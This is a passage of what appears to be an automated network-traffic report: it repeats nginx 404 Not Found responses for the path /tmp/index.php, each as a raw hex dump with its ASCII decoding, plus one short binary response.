71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 